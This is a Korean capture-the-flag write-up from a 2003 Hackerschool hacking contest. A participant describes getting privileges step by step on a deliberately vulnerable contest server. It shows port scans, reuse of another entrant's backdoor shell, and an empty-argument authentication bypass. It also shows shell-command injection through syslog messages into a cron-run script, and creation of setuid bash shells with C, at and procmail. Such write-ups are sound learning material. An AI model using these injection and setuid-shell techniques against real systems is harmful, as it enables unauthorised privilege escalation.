::: 다음은 이번 제 4회 Hacking The Linux Contest에서 4위를 차지한 loafers님의 공격 보고서입니다. :::

해커스쿨 제4회 Hacking the Linux Server Contest 공격 보고서

o 아이디: loafers

고유번호: #H4SC30267

작성자: 유진호, jhyou@chonnam.chonnam.ac.kr

o 최종 상태

guru2 또는 guru3 획득 상태에서 대회 종료

==============================================================================

1 문제 개요

1.1 대회서버1(attack.hackerschool.org) 문제

o 원격공격 -> guta

- 원격 공격을 통해 대회서버1 진입하여 nobody 권한 획득

- http://attack.hackerschool.org/~guta 또는

http://attack.hackerschool.org/~mung의 홈페이지 허점을 공격

- /bin/register를 통해 guta 계정의 패스워드를 얻음

o guta -> level1 획득

- guta 아이디로 대회서버1에 접속하여 level1 SUID된 auth 프로그램 공격

-rwsr-x--- 1 level1 guta 12802 6월 28 03:07 /home/guta/QUESTION/auth

- auth의 제어흐름 구조를 분석하는 문제

- /bin/register로부터 level1 패스워드 획득

o level1 -> level2 획득

- level1으로 대회서버1으로 telnet/ssh 접속

- 세부문제1: 2차인증 방어벽 통과

- 세부문제2: syslogd 서버/crond 서버를 이용한 level2 SUID된 쉘 백도어 생성

- /bin/register로부터 level2와 level3의 패스워드 획득

o level2 GID -> level3 GID 획득

- level3로 대회서버1에 쉘 접속하면 RGID/EGID를 level2로 변경하는

only_uid_shell이 실행됨

- level3 UID와 현재 주어진 그룹권한을 이용하여 level3 SGID된 쉘 획득

- /bin/register로부터 대회서버2의 주소와 guru1의 패스워드 획득

1.2 대회서버2(guru.hackerschool.org) 문제

o guru1 로그인 문제

- '돌아온 암호맨' 2차 암호인증 방어벽 통과

o guru1 -> guru2 문제

- guru2 SUID된 /home/guru1/QUESTION/vuln 공격

* vuln 실행 프로그램 역어셈블을 통해 프로그램 구조 분석을 통해

vuln이 /bin/bash를 실행하는 조건을 찾는 문제

- /bin/register로부터 guru2의 패스워드 획득

o guru2 -> guru3 문제

- guru3 SUID된 /home/guru2/QUESTION/vuln 공격

* vuln가 스택에서 버퍼오버플로우를 일으키도록 유도하는 문제

- /bin/register로부터 guru3의 패스워드 획득

o guru3 -> root 문제

- root권한으로 실행되는 /home/guru3/QUESTION/vuln 공격

- vuln은 raw socket 모드로 패킷을 경청하는 프로그램

송신지 IP가 123.234.123.234이고 목적지 포트가 777로 설정된 패킷의

메시지를 버퍼에 복사하면서 오버플로우를 일으킴

- 원격지에서 송신지 IP와 메시지 내용을 조작한 TCP 패킷을 생성하여

대회서버2에 보내는 문제

==============================================================================

2 대회서버1: 원격공격

o 문제 개요

- 원격 공격을 통해 대회서버1 진입하여 nobody 권한 획득

- /bin/register를 통해 guta 아이디의 패스워드를 얻음

o 공지사항: 제4회 해킹 대회가 시작되었습니다!

http://event.hackerschool.org/bbs/view.php?id=notice&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_

arrange=headnum&desc=asc&no=25

--------------------------------------------------------------------------

Welcome to Hacking the linux server CONTEST!!

대회가 시작되었습니다.!

공격 서버 주소 : attack.hackerschool.org(http://attack.hackerschool.org)

도메인 접속이 되지 않을 경우 : 218.149.4.122

문제 풀이 방식 : 참가자는 먼저 위 서버의 원격 취약점을 발견하여

로컬 접근 권한을 획득해야 합니다.

그 후, 로컬 상에 있는 문제들을 풀어 단계적으로 다음

권한을 획득하고, 최종적으로 root 권한을 획득하는

것이 이번 대회의 최종 목표입니다.

입상자 선별 : 이번 대회에서 얻은 포인트가 가장 높은 순으로 입상자가

선별됩니다.

서버 취약점 : 해킹 대회 서버의 취약점은 해커스쿨의 문제 출제자들이

임의로 만들어 설치해 놓은 것입니다.

그 외, 리눅스 시스템 자체의 취약점이 존재할 가능성도

있습니다.

* 이벤트에 참여하신 모든 분들에게 좋은 성과가 있길 바랍니다.!

--------------------------------------------------------------------------

o http://attack.hackerschool.org 페이지

+----------------------------------------------------------------------------+

| [만화삽화] |

| 사용기간이 만료되어 사용정지된 구타의 홈페이지의 게시판을 보고 속상해한다. |

| 이때 멍멍이형이 나타나 자신이 쓰는 서버 계정에 JSBOARD를 설치하여 구타에게 |

| 선물한다. 이렇게 멍멍이형은 착하고 고마운데, 못된 구타는 멍멍이형의 계정을 |

| 해킹할 궁리를 한다. |

| |

| 자~! 완료 이제 공짜 게시판 주워다니러 다니지 않아도 될꺼다. |

| http://attack.hackerschool.org/~guta 이게 새로운 주소니까 잘 써~! |

| |

+----------------------------------------------------------------------------+

o http://attack.hackerschool.org/~guta 구타의 홈페이지

+----------------------------------------------------------------------------+

| GUTA'S HOME [구타얼굴] |

| |

|==================================================[자유게시판][비밀일기장] |

| |

| +--------------------------------------------------------------+ |

| | 제목 이름 파일 날짜 조회 | |

| +--------------------------------------------------------------+ |

| | --------------------- ----- ------- ----- -- | |

| +--------------------------------------------------------------+ |

| |

| Copyleft 1999-2003 by JSBoard Open Project |

+----------------------------------------------------------------------------+

guta의 홈페이지에는 Jsboard 2.0.5 버전의 파일업로드가 가능한 게시판이

설치되어있다. 페이지 오른편 상단에는 [자유게시판]과 [비밀일기장] 링크가 있다.

위의 [자유게시판] 링크는 이 홈페이지 자신인 것 같다.

[비밀일기장] 링크는 아이디와 패스워드를 묻는 JSBoard Login 페이지가 나온다.

+------------------------------+

| JSBoard Login |

+------------------------------+

| User [ ] |

| Password [ ] |

| Session Reset [Reset][Login] |

+------------------------------+

이 게시판 또는 인증 페이지를 공격하여 침입하는 문제인가 보다.

이때 문제분석도중 대회 홈페이지 공지사항에 힌트가 나왔다.

o 대회 공지사항 게시판에 뜬 힌트: 대회 1 서버에 대한 힌트가 나갑니다.

-----------------------------------------------------------------------------

* 리모트 문제

- 만화에 엄청난 힌트가 있습니다.^^

- 리모트 어택을 성공시키기 위한 두 가지 방법이 있습니다. 한 가지는 비교적

쉬운 풀이 방법으로, 문제 출제자가 유도한 방향으로 접근하는 것이고,

다른 한 가지는 게시판 자체의 취약점을 직접 발견하는 것입니다. 이미 몇몇

분들은 게시판 자체의 취약점을 발견하여 로컬 접속을 하였습니다. 하지만,

출제자가 의도한 훨씬 쉬운 접근 방법이 있다는 점을 참고하시기 바랍니다.

- 저희가 의도한 취약점은 "파일 업로드"와는 관련 없습니다.

- attack.hackerschool.org에는 구타의 홈페이지 외에 또 다른 홈페이지가

있습니다.

-----------------------------------------------------------------------------

구타의 홈페이지 외에 또 다른 홈페이지가 있다고?

서버의 포트를 스캔해보기로 했다.

o 대회서버1 포트 분석

[root@loafers]# nmap attack.hackerschool.org -p1-65535

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on (218.149.4.122):

(The 65512 ports scanned but not shown below are in state: closed)

Port State Service

22/tcp open ssh

23/tcp open telnet

80/tcp open http

111/tcp open sunrpc

139/tcp filtered netbios-ssn

445/tcp filtered microsoft-ds

769/tcp filtered vid

1180/tcp filtered unknown

1181/tcp filtered unknown

1182/tcp filtered unknown

1214/tcp filtered unknown

1434/tcp filtered ms-sql-m

3306/tcp open mysql

3345/tcp filtered unknown

4000/tcp open remoteanything

4661/tcp filtered unknown

4662/tcp filtered unknown

4665/tcp filtered unknown

9876/tcp open sd

28001/tcp filtered unknown

29851/tcp filtered unknown

29853/tcp filtered unknown

32768/tcp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 568 seconds

[root@loafers]#

ssh/telnet/http/mysql 서비스가 열려있고,

9876 포트에 의심스러운 포트가 열려있다.

어쩌면 9876이 힌트에서 말한 다른 홈페이지인가?...

9876을 웹 서버 포트로 생각하고 접근해보았다.

o http://attack.hackerschool.org:9876 페이지

------------------------------------------------------------------------

Use of uninitialized value in pattern match (m//) at

/usr/lib/perl5/vendor_perl/5.8.0/URI/Heuristic.pm line 97.

An Error Occurred

500 Can't connect to HTTP:80 (Bad hostname 'HTTP')

Directory listing of /

* ./

* ../

* .autofsck

* RegisterRoom/

* bin/

* boot/

* dev/

* etc/

* home/

* initrd/

* lib/

* lost+found/

* misc/

* mnt/

* opt/

* proc/

* root/

* sbin/

* tftpboot/

* tmp/

* usr/

* var/

------------------------------------------------------------------------

이상하다... / 디렉토리 목록이 보이고... 이 페이지를 활용해 공격하란 말인가?

아파치 웹서버는 아닌 것 같고 어쩌면 대회문제용으로 만든 웹서버 프로그램인가보다.

nc(netcat)을 이용하여 9876 포트에 접속하였고, "GET / HTTP/1.0" 질의를 보냈다.

--------------------------------------------------------------------------

[root@loafers]# nc 218.149.4.122 9876

GET / HTTP/1.0

Use of uninitialized value in pattern match (m//) at /usr/lib/perl5/vendor_perl/5.8.0/URI/Heuristic.pm line 97.

<HTML>

<HEAD><TITLE>An Error Occurred</TITLE></HEAD>

<BODY>

<H1>An Error Occurred</H1>

500 Can't connect to HTTP:80 (Bad hostname 'HTTP')

</BODY>

</HTML>

<HTML>

<HEAD>

<TITLE>Directory /</TITLE>

</HEAD>

<BODY>

<H1>Directory listing of /</H1>

<UL>

<LI><A HREF=".autofsck">.autofsck</A>

<LI><A HREF="RegisterRoom%2F">RegisterRoom/</A>

<LI><A HREF="initrd%2F">initrd/</A>

<LI><A HREF="lost%2Bfound%2F">lost+found/</A>

<LI><A HREF="tftpboot%2F">tftpboot/</A>

</UL>

</BODY>

</HTML>

--------------------------------------------------------------------------

이상하다. 아래와 같은 웹서버 응답 헤더가 출력되지 않고 perl 프로그램

오류메시지(Use of uninitialized value in pattern match...)가 나온다.

HTTP/1.1 200 OK

Date: Mon, 30 Jun 2003 14:58:21 GMT

Server: Apache/2.0.40 (Red Hat Linux)

Accept-Ranges: bytes

X-Powered-By: PHP/4.2.2

Content-Length: 141

Connection: close

Content-Type: text/html; charset=EUC-KR

Content-Language: kr

어쩌면 이것은 perl로 만들어진 간이 웹서버인가보다.

HEAD 질의 등 몇 개의 HTTP 질의메시지를 입력해본 후, 'GET'만을 명령을 입력하고

엔터를 쳤다.

o nc로 대회서버1의 9876 포트에 접속한 상태에서 GET 명령 입력

-------------------------------------------------------------------------------

GET

Use of uninitialized value in pattern match (m//) at /usr/lib/perl5/vendor_perl/5.8.0/URI/Heuristic.pm line 97.

Usage: GET [-options] <url>...

-m <method> use method for the request (default is 'GET')

-f make request even if GET believes method is illegal

-b <base> Use the specified URL as base

-t <timeout> Set timeout value

-i <time> Set the If-Modified-Since header on the request

-c <conttype> use this content-type for POST, PUT, CHECKIN

-a Use text mode for content I/O

-p <proxyurl> use this as a proxy

-P don't load proxy settings from environment

-H <header> send this HTTP header (you can specify several)

-u Display method and URL before any response

-U Display request headers (implies -u)

-s Display response status code

-S Display response status chain

-e Display response headers

-d Do not display content

-o <format> Process HTML content in various ways

-v Show program version

-h Print this message

-x Extra debugging output

-----------------------------------------------------------------------------

어~ GET 명령의 사용법이 나오네... 혹시 이것은 웹서버를 가장한 쉘 백도어인가?

ls와 pwd 명령을 입력해보았다.

o nc로 대회서버1의 9876 포트에 접속한 상태에서 ls, pwd 명령 입력

-----------------------------------------------------------------------------

bind

init

lostin

sh2

test

test1

wg.php.bak

pwd

/home/guta/public_html/jsboard/data/guta/files/20030628133258

-----------------------------------------------------------------------------

엥~ 이건 쉘이잖아! 에잉~ 너무 쉬운 문제네~ ^^

GET, HEAD 등 HTTP 질의 프로토콜을 지원하여 공격자를 속이는 간단한 쉘

백도어였나보다. 힌트보길 잘했다.

(이때까지 조금 의아해했지만 뭔가 이상하다는 것을 인식하지는 못했다...)

/bin/register를 실행하여 문제해결 등록을 하여 guta 계정의 패스워드를 얻었다.

-------------------------------------------------------------------------

uid=99(nobody) gid=99(nobody) groups=99(nobody)

/bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

guta 계정의 Password는 gjqjrwl입니다.

건투를 빕니다.!

-------------------------------------------------------------------------

야호~ 성공이다! 얼른 다음 문제 풀어야지~

그런데...... 이게 웬 챙피냐...

대회가 끝난 뒤에 힌트 공지에 아래와 같은 안내를 보니....

-------------------------------------------------------------------------

- attack.hackerschool.org에는 구타의 홈페이지 외에 또 다른 홈페이지가

있습니다.

- attack.hackerschool.org/~mung에 멍멍이의 홈페이지가 있습니다.

-------------------------------------------------------------------------

다른 홈페이지가 있다는 힌트가 attack.hackerschool.org/~mung 였구나...

그런데, 저것은 80번 포트잖아. 그럼, 내가 접속한 9876 포트는... 그렇다면...

으악! 대회참가자 누군가가 만들어 놓은 백도어였던 것이 아닌가!!!!

지난 3회대회에서 다른 사람이 만들어 놓은 /tmp/sepi 백도어 쉘을 훔쳐서

무임승차한 전과가 있는데, 이번에도 또!!!! 그럼, 난 전과 2범...

이 사실이 알려지면 난 이 세계에서 퇴출당할 것만 같다... ㅜ.ㅠ

나의 이런 과오가 용서될 수 있을까? 고민스럽다.

백도어 설치해놓은 그 고마운 사람이 이번엔 *정말 밉다*! ㅠ.ㅠ

9876 포트가 GET, HEAD 질의에 응답했던 것은 대회서버1 시스템의 /usr/bin/GET,

/usr/bin/HEAD 프로그램이 실행되었기 때문이었다. 이 프로그램들은

perl-libwww-perl 패키지에 들어있는 것이다.

[root@loafers]# rpm -qf /usr/bin/GET

perl-libwww-perl-5.65-6

이것을 잘못 오해한 loafers는 결국 이번 대회 첫번째 문제를 풀어보질 못했다.

다른 훌륭한 분들의 결과보고서를 보고 배워야겠다.

==============================================================================

3 대회서버1 지역공격: guta -> level1 계정 권한 얻기

[root@loafers]# ssh guta@attack.hackerschool.org

guta@attack.hackerschool.org's password: gjqjrwl

[guta@attack QUESTION]$ ls -l /home/guta/QUESTION

합계 24

-r--r----- 1 level1 level1 38 6월 28 02:54 Password.txt

-rwsr-x--- 1 level1 guta 12802 6월 28 03:07 auth

-rw-r--r-- 1 root root 794 6월 28 03:07 auth.c

-rw-r--r-- 1 root root 0 6월 28 15:10 level1

[guta@attack QUESTION]$ cat /home/guta/QUESTION/auth.c

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

void print_error(char *prog)

{

fprintf(stdout, "Usage : %s password\n", prog);

exit(-1);

}

int main(int argc, char *argv[])

{

FILE *fp;

char password[40];

char *pointer1, *pointer2;

// 입력 에러 처리

if(argc!=2)

print_error(argv[0]);

// Correct Password Loading

fp = fopen("/home/guta/QUESTION/Password.txt", "r");

fgets(password, 40, fp);

password[strlen(password)-1] = '\0';

fclose(fp);

pointer1 = password;

pointer2 = argv[1];

// 입력한 문자열과 Correct Password를 비교

while(*pointer2){

if(*(pointer2++) != *(pointer1++)){

fprintf(stdout, "Password is not correct!\n");

return -1;

}

// 맞다면 인증 통과

printf("Wow! You got the new shell\n");

setreuid(505, 505);

system("/bin/bash -p");

}

[guta@attack QUESTION]$

---------------------------------------------------------------------

힌트로 auth.c 소스 프로그램이 이미 주어진 상태여서 프로그램 분석이 쉬웠다.

위 프로그램은 인증이 맞으면 level1(505) 권한으로 bash 쉘을 실행시킨다.

argv[1]이 길이가 0인 ""이라면 while 반복문 안의 패스워드 인증 코드를 그냥

지나칠 수 있다(아래 두 줄 코드 참조).

pointer2 = argv[1];

while(*pointer2){

auth 프로그램의 argv[1] 매개변수로 길이가 0인 문자열로 설정하여 실행하여

level1 권한을 획득하였다.

[guta@attack QUESTION]$ ./auth ""

Wow! You got the new shell

[level1@attack QUESTION]$ id

uid=505(level1) gid=504(guta) groups=504(guta)

[level1@attack QUESTION]$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

level1 계정의 Password는 aksgdlwhffu입니다.

건투를 빕니다.!

[level1@attack QUESTION]$

==============================================================================

4 대회서버1: level1 -> level2 계정 권한 얻기

4.1 문제 구성

o /home/level1에 설치된 파일들

[level1@attack level1]$ ls -la /home/level1

합계 16

drwx------ 3 level1 level1 4096 6월 28 03:20 .

drwxr-xr-x 28 root root 4096 6월 28 02:03 ..

-rw-r--r-- 1 root root 191 6월 28 03:20 .bash_profile

-rw-r--r-- 1 root root 124 6월 28 03:20 .bashrc

drwxr-x--- 2 root level1 4096 6월 28 03:10 QUESTION

-rwxr-xr-x 1 root root 12229 6월 28 03:27 reconfirm

o level1으로 로그인하면 /home/level1/reconfirm 프로그램을 실행하고

로그아웃(exit)하도록 .bashrc에 설정되어있다.

reconfirm은 2차 암호인증 프로그램이다.

[level1@attack level1]$ cat /home/level1/.bashrc

# .bashrc

# User specific aliases and functions

# Source global definitions

if [ -f /etc/bashrc ]; then

. /etc/bashrc

./reconfirm

exit

[level1@attack level1]$

o 2차 암호인증 프로그램 /home/level1/reconfirm의 C언어 소스 프로그램(추측)

--------------------------------------------------------------------------

#include <stdio.h>

char pass_str[] = "dnghlgo";

int main()

{

char *dummy;

char *password;

char buf[20];

password = pass_str;

dummy = pass_str + 4;

printf("2차 암호를 입력하시오. : ");

fgets(buf, 19, stdin);

if (strncmp(password, buf, 7) == 0) {

printf("맞춰봐야 소용 없죠..^^\n");

} else {

fprintf(stdout, "2차 암호가 틀렸습니다.\n");

sleep(1);

}

--------------------------------------------------------------------------

reconfirm 프로그램은 문자열을 입력받는 프로그램일 뿐 암호를 맞추더라도

아무런 역할을 하지않는다.

o 힌트 파일

[level1@attack QUESTION]$ cat /home/level1/QUESTION/hint.txt

SYSLOGD

[level1@attack QUESTION]$

o syslogd 데몬의 설정 파일: /etc/syslogd.conf

시스템에는 시스템 메시지를 분류하여 해당 로그파일에 기록해주는 서비스를 하는

syslogd 데몬이 실행되고 있다. /etc/syslogd.conf에는 다음과 같이 설정되어있다.

----------------------------------------------------------------------------

[level1@attack log]$ cat /etc/syslog.conf

# Log all kernel messages to the console.

# Logging much else clutters up the screen.

#kern.* /dev/console

# Log anything (except mail) of level info or higher.

# Don't log private authentication messages!

*.info;mail.none;authpriv.none;cron.none /var/log/messages

# The authpriv file has restricted access.

authpriv.* /var/log/secure

# Log all the mail messages in one place.

mail.* /var/log/maillog

# Log cron stuff

cron.* /var/log/cron

# Everybody gets emergency messages

*.emerg *

# Save news errors of level crit and higher in a special file.

uucp,news.crit /var/log/spooler

# Save boot messages also to boot.log

local7.* /var/log/boot.log

# for hacking contest

# this script excutes by crond every minute

local5.warning /home/level2/QUESTION/backdoor.sh

[level1@attack log]$

----------------------------------------------------------------------------

local5.warning /home/level2/QUESTION/backdoor.sh

위 설정은 우선순위 local5.warning의 메시지들을 /home/level2/QUESTION/backdoor.sh에

저장하라는 것이다.

o /home/level2/QUESTION/backdoor.sh을 주기적으로 실행하는 level2 사용자의 crontab

설정이 되어있다(아래 내용은 추측하여 구성).

----------------------------------------------------------------------------

[level2@attack level2]$ crontab -l

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (/tmp/crontab.3819 installed on Mon Jun 23 02:58:35 2003)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

MAILTO=""

* * * * * /bin/sh /home/level2/QUESTION/backdoor.sh

----------------------------------------------------------------------------

4.2 공격 과정

4.2.1 2차 암호 인증 과정 우회

level1 계정에 접속했는데 서버는 2차 암호를 물었다. 암호를 하나 대충 입력했더니

접속이 끊긴다.

[root@loafers]# ssh level1@218.149.4.122

level1@218.149.4.122's password: aksgdlwhffu

Last login: Tue Jul 1 02:04:54 2003 from 123.123.123.123

2차 암호를 입력하시오. : asdasd

2차 암호가 틀렸습니다.

Connection to localhost closed.

[root@loafers]#

암호 입력 부분에서 Ctrl-C 키를 눌러보았다. 그랬더니 쉘 프롬프트가 보였다.

Ctrl-C 키에 의해 발생한 SIGINT 시그널에 의해 level1의 로그인쉘 /bin/bash가

실행한 /home/level1/reconfirm 프로그램과 /home/level1/.bashrc 스크립트가

중도에 종료되고, /bin/bash가 다음 단계를 계속 진행한 것이다.

[root@loafers]# ssh level1@218.149.4.122

level1@218.149.4.122's password: aksgdlwhffu

2차 암호를 입력하시오. : <Ctrl-C>

[level1@attack level1]$ id

uid=505(level1) gid=505(level1) groups=505(level1)

[level1@attack level1]$

4.2.2 syslogd/crond 데몬 조합을 이용한 level2 UID 획득

/home/level1/QUESTION/hint.txt 파일의 힌트를 읽어 보았다.

[level1@attack QUESTION]$ cat /home/level1/QUESTION/hint.txt

SYSLOGD

[level1@attack QUESTION]$

syslogd 데몬과 관련이 있다는 의미일 것이다.

/etc/syslog.conf 파일을 살펴보았다.

-----------------------------------------------------------------------------

[level1@attack log]$ cat /etc/syslog.conf

# Log all kernel messages to the console.

# Logging much else clutters up the screen.

#kern.* /dev/console

~~~~~~~~~~~~~~~~~~~~~~~~ 중간생략 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# for hacking contest

# this script excutes by crond every minute

local5.warning /home/level2/QUESTION/backdoor.sh

[level1@attack log]$

-----------------------------------------------------------------------------

우선순위 local5.warning의 메시지들을 /home/level2/QUESTION/backdoor.sh에

저장하는 설정이 되어있다. 설명문에 backdoor.sh은 매분마다 crond서버에 의해

실행된다고 쓰여있다(#this script excutes by crond every minute). 아마 level2

사용자의 cron 작업으로 backdoor.sh 실행이 등록된 것으로 짐작된다.

/home/level2/QUESTION/backdoor.sh 파일이 있는지 확인해 보았다.

----------------------------------------------------------------------

[level1@attack log]$ ls -ld /home/level2/QUESTION/backdoor.sh

-rwxrwx--- 1 root level2 12 6월 28 19:50 backdoor.sh

[level1@attack log]$

----------------------------------------------------------------------

/home/level2/QUESTION/backdoor.sh 파일에 level2 SUID/SGID된 bash 쉘

/tmp/loafers를 만드는 쉘명령을 넣어두면 될 것이다.

화면에는 누군가가 level2 공략을 위해 syslog 메시지를 열심히 날리고 있었다.

-------------------------------------------------------------------------

Message from syslogd@attack at Sat Jun 28 19:26:19 2003 ...

attack sys: chown level2.level2 /tmp/.oo/bash

Message from syslogd@attack at Sat Jun 28 19:26:50 2003 ...

attack last message repeated 2 times

-------------------------------------------------------------------------

syslog 메시지는 logger 프로그램으로 발생시킬 수 있고, backdoor.sh에 기록되는

내용은 다음과 같다.

----------------------------------------------------------------------------

[root@loafers]# logger -p local5.warning 'THIS IS A SYSLOG MESSAGE.'

[root@loafers]# cat /home/level2/QUESTION/backdoor.sh

Jul 1 04:46:15 loafers 7월 1 04:46:15 root: THIS IS A SYSLOG MESSAGE.

----------------------------------------------------------------------------

level2의 cron 작업은 backdoor.sh 스크립트를 매분 실행하는데,

backdoor.sh에 저장된 각 syslog 메시지들을 쉘명령으로 여기고 실행한다.

각 메시지 줄은 "로그 시각 아이디: 메시지" 형태이므로 정상적인 쉘명령이 아니다.

그러므로, 보통 각 줄은 쉘에 의해 실행될 때 "Command not found" 에러를 낸다.

그러나, 만약 syslog 메시지를 "; 쉘명령"과 같이 ';'으로 시작하도록 설정하면

backdoor.sh에 저장된 각 줄은 '로그날짜(쓰레기 명령) ; 쉘명령'형태가 되는데

이것은 ';'으로 연결된 두 개의 쉘 명령이다.

즉, 로그 메시지를 '; cp /bin/bash /tmp/loafers;chmod +s /tmp/loafers'로

설정하면 backdoor.sh에는 다음 내용이 기록되고,

---------------------------------------------------------------------------------------------------

Jul 1 04:04:22 loafers 7월 1 04:04:22 level1: ; cp /bin/bash /tmp/loafers;chmod +s /tmp/loafers

---------------------------------------------------------------------------------------------------

이 줄이 쉘에 의해 실행될 때에는 다음과 같이 세개의 명령으로 나뉘어 각각이

차례대로 실행된다.

Jul 1 04:04:22 loafers 7월 1 04:04:22 level1:

cp /bin/bash /tmp/loafers

chmod +s /tmp/loafers

첫 부분인 "Jul 1 ..."은 에러를 내지만 나머지는 정상적으로 실행된다.

/home/level2/QUESTION/backdoor.sh 파일에 level2 SUID/SGID된 bash 쉘

/tmp/loafers를 만드는 쉘명령을 넣어두고, /tmp/loafers가 만들어지길

기다렸다.

------------------------------------------------------------------------------

[level1@attack level1]$ logger -p local5.warning '; cp /bin/bash /tmp/loafers;chmod +s /tmp/loafers;'

[level1@attack level1]$ ls -l /home/level2/QUESTION/backdoor.sh

-rwxrwx--- 1 root level2 111 6월 28 21:23 /home/level2/QUESTION/backdoor.sh

[level1@attack level1]$ ls -l /tmp/loafers

ls: /tmp/loafers: 그런 파일이나 디렉토리가 없음

[level1@attack level1]$ ls -l /tmp/loafers

ls: /tmp/loafers: 그런 파일이나 디렉토리가 없음

[level1@attack level1]$ ls -l /tmp/loafers

ls: /tmp/loafers: 그런 파일이나 디렉토리가 없음

[level1@attack level1]$ ls -l /tmp/loafers

-rwsr-sr-x 1 level2 level2 626028 6월 28 21:24 /tmp/loafers

[level1@attack level1]$

------------------------------------------------------------------------------

/tmp/loafers를 실행하여 level2 effective uid를 얻고,

level2 real uid를 얻기위해 effective uid를 real uid로 설정한 후 쉘을 실행시키는

코드를 작성하였다.

-----------------------------------------------------------------------------------

[level1@attack level1]$ /tmp/loafers -p

loafers-2.05b$ id

uid=505(level1) gid=505(level1) euid=506(level2) egid=506(level2) groups=505(level1)

[level1@attack level1]$ cat /tmp/shell.c

main()

{

setregid(getegid(),getegid());

setreuid(geteuid(),geteuid());

system("/bin/csh");

}

loafers-2.05b$ gcc -o /tmp/loafers.shell /tmp/shell.c

loafers-2.05b$ /tmp/loafers.shell

[level1@attack /tmp]$ id

uid=506(level2) gid=506(level2) groups=505(level1)

[level1@attack /tmp]$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

level2 계정의 Password는 aoxmflrtm입니다.

level3 계정의 Password는 tpqktmcks입니다.

[level1@attack /tmp]$

-----------------------------------------------------------------------------------

==============================================================================

5 대회서버1: level3 GID 획득하기

5.1 문제 구성

o /home/level3

bash-2.05b$ ls -l /home/level3

total 20

drwxr-x--- 2 root level3 4096 Jun 28 10:34 CONGRATULATION

drwxr-xr-x 2 root root 4096 Jun 28 16:30 QUESTION

-rwxr-s--- 1 level3 level2 11869 Jun 28 11:27 only_uid_shell

o level3의 로그인 쉘을 /home/level3/only_uid_shell로 설정했다.

bash-2.05b$ grep level3 /etc/passwd

level3:x:507:507::/home/level3:/home/level3/only_uid_shell

o /home/level3/only_uid_shell은 real/effective GID를 모두 level2로 바꾼 후

/bin/bash를 실행시키는 프로그램이다.

- /home/level3/only_uid_shell의 프로그램 소스(역 어셈블)

-----------------------------------------------------------------

int main()

{

setregid(506, 506); /* 506 == level2의 gid */

printf("Sorry, I stole your GID authority.\n");

system("id");

system("/bin/bash");

}

-----------------------------------------------------------------

o only_uid_shell을 수정할 수 없도록 파일 속성 설정

bash-2.05b$ ls -l /home/level3/only_uid_shell

-rwxr-s--- 1 level3 level2 11869 Jun 28 11:27 only_uid_shell

bash-2.05b$ lsattr /home/level3/only_uid_shell

----ia------- /home/level3/only_uid_shell

o 힌트 파일

bash-2.05b$ cat /home/level3/QUESTION/hint.txt

uid -> gid

Can you do this?

bash-2.05b$

o 공격 목표: level3 GID 획득

level3 계정으로 접속한 후 /bin/register를 실행했더니, 쩝.

[root@loafers]# ssh level3@218.149.4.122

level3@218.149.4.122's password: tpqktmcks

Sorry, I stole your GID authority.

uid=507(level3) gid=506(level2) groups=507(level3)

bash-2.05b$

bash-2.05b$ /bin/register

건투를 빕니다.

GID를 확인해 주세요.

bash-2.05b$

5.2 공격 과정

o /bin/su

su는 로그인 쉘인 only_uid_shell을 다시 실행하므로 여기서는 의미가 없다.

o /usr/bin/newgrp

newgrp는 매개변수 없이 실행하면 현재 UID에 대한 로그인 GID를 갖는 쉘을 실행시켜

주므로 이를 이용하여 level3 GID를 획득할 수 있지만, /usr/bin/newgrp를 root가

아닌 사용자가 사용할 수 없도록 이미 root SUID 설정을 없애버렸다.

bash-2.05b$ ls -l /usr/bin/newgrp

-rwx--x--x 1 root root 4728 2월 25 09:11 /usr/bin/newgrp

o /usr/bin/crontab

level3 사용자의 cron 작업은 level3의 로그인 GID인 level3 권한으로

실행되므로 이를 이용하여 level3 GID를 획득할 수 있지만,

/usr/bin/crontab을 root가 아닌 사용자가 사용할 수 없도록 이미 root SUID 설정을

없애버렸다.

bash-2.05b$ ls -l /usr/bin/crontab

-rwxr-xr-x 1 root root 110114 Feb 19 22:39 /usr/bin/crontab

bash-2.05b$ crontab -e

seteuid: Operation not permitted

bash-2.05b$

o /usr/bin/at

at 데몬을 이용한 예약 서비스는 등록은 가능했지만 예약된 작업은 예약 당시의

UID와 GID와 동일한 상태에서 실행되었다. 즉, 쓸모가 없었다.

bash-2.05b$ ls -l /usr/bin/at

-rwsr-xr-x 1 root root 37284 Jan 25 06:45 /usr/bin/at

bash-2.05b$

bash-2.05b$ at now + 1 min

warning: commands will be executed using (in order) a) $SHELL b) login shell c) /bin/sh

at> cp /bin/bash /tmp/loafers; chmod +s /tmp/loafers

at> <EOT>

job 2 at 2003-06-28 22:03

bash-2.05b$

bash-2.05b$ ls -l /tmp/loafers

-rwsr-sr-x 1 level3 level2 626028 Jun 28 22:03 /tmp/loafers

bash-2.05b$

o ~/.procmailrc

사용자에 메일이 도착하면 /usr/bin/procmail에 의해 ~/.procmailrc에 정의된

필터가 실행되는데, 이때 필터 프로그램은 해당 사용자의 로그인 UID/GID 권한으로

실행된다. 이를 이용하여 level3 SGID된 쉘을 생성할 수 있다.

bash-2.05b$ cat /home/level3/.procmailrc

:0 B

* .

|cp /bin/bash /tmp/loafers; chmod a+sx /tmp/loafers

bash-2.05b$ echo xxx | mail level3

bash-2.05b$ ls -l /tmp/loafers

-rws--s--x 1 level3 level3 626188 7월 1 07:08 /tmp/loafers

그러나, 어떤 이유에서인지 대회서버에서는 level3의 .procmailrc는 실행되지

않았다. 확인해보질 못했지만 지금 생각해볼 때 어쩌면 level3 계정에 도착한 메일을

다른 곳으로 전달하는 /home/level3/.forward 파일이 있었는지도 모르겠다. 또는...

o /bin/chgrp

여러 방법을 궁리해보았지만 성공하질 못했다. 그런데, chgrp를 이용하면 된다는

힌트가 대회 홈페이지 공지사항에 공개되었다. 누군가의 "헉!" 소리 댓글과 함께.

딱 loafers 심정도 그랬다. 아주 평범한 방법을 곁에 두고 멀리 돌아다니기만 했다!

